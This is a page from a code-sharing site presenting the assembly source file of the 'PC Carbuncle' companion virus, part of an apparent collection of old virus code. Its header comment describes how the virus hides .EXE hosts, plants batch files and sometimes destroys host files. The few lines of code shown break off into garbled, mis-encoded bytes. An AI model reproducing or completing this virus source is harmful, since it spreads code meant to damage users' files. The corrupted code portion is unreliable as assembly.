carbunc.asm

来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 25 行

ASM
25
字号
;The PC CARBUNCLE VIRUS - a companion virus for Crypt Newsletter 14                
;The PC Carbuncle is a "toy" virus which will search out every .EXEfile
;in the current directory, rename it with a .CRP [for Crypt] extent and
;create a batchfile.  The batchfile calls the PC Carbuncle [which has
;copied itself to a hidden file in the directory], renames the host
;file to its NORMAL extent, executes it, hides it as a .CRP file once
;again and issues a few error messages.  The host files function
;normally. Occasionaly, the PC Carbuncle will copy itself to a few
;of the host .CRP files, destroying them.  The majority of the host
;files in the PC Carbuncle-controlled directory will continue to function,
;in any case.  If the user discovers the .CRP and .BAT files and is smart
;enough to delete the batchfiles and rename the .CRP hosts to their
;normal .EXE extents, the .CRPfiles which have been infected by the
;virus will re-establish the infection in the directory.
;--Urnst Kouch, Crypt Newsletter 14
		
		.radix 16
     code       segment
		model  small
		assume cs:code, ds:code, es:code

		org 100h
begin:
		jmp     vir_start
		db     '釢.氣Nst哾塎

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?